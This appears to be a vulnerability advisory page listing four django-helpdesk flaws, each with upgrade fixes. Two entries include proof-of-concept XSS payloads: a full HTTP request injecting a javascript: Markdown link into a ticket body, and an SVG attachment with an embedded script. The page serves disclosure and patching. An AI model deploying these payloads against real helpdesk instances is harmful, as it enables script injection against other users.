Insecure Inherited Permissionsdjango-helpdesk is a Django-powered ticket tracker for your helpdesk
Affected versions of this package are vulnerable to Insecure Inherited Permissions due to the improper setting of os.umask(0) in models.py. An attacker can access sensitive data without proper authorization by exploiting the insecure permission settings.
How to fix Insecure Inherited Permissions? Upgrade django-helpdesk to version 1.0.0 or higher.
| |
Cross-site Scripting (XSS)django-helpdesk is a Django-powered ticket tracker for your helpdesk
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via Markdown at Description or Comment of a ticket. When rendering to Markdown, the application does not filter and check if the properties are valid.
##POC:
POST /tickets/submit/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/tickets/submit/
Content-Type: multipart/form-data; boundary=---------------------------69350364819088505273728279714
Content-Length: 1161
Origin: http://127.0.0.1:8080
DNT: 1
Connection: close
Cookie: csrftoken=UQd46tUHKV3P08qcvIBTOBWDzS9nDZT8TDeCT6W8ThDUPLdWgKmlxwF3bBEGThC0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="csrfmiddlewaretoken"
o6SgjwQ9VozjIi2mYHAi5ImkD7UbKviMnTTO69SA4K9oxVP6JJlKOD5KfQpu0N1E
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="queue"
1
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="title"
XSS Markdown
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="body"
[XSS](javascript:alert(`document.domain`))
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="priority"
3
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="due_date"
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="submitter_email"
xss@test.com
-----------------------------69350364819088505273728279714--
How to fix Cross-site Scripting (XSS)? Upgrade django-helpdesk to version 0.3.2 or higher.
| |
Cross-site Scripting (XSS)django-helpdesk is a Django-powered ticket tracker for your helpdesk
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via upload Attachments with format .svg or .html.
PoC
// PoC.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>
How to fix Cross-site Scripting (XSS)? Upgrade django-helpdesk to version 0.3.1 or higher.
| |
Cross-site Scripting (XSS)django-helpdesk is a Django-powered ticket tracker for your helpdesk
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via lack of sanitization in the title of tickets created.
How to fix Cross-site Scripting (XSS)? Upgrade django-helpdesk to version 0.3.1 or higher.
| |
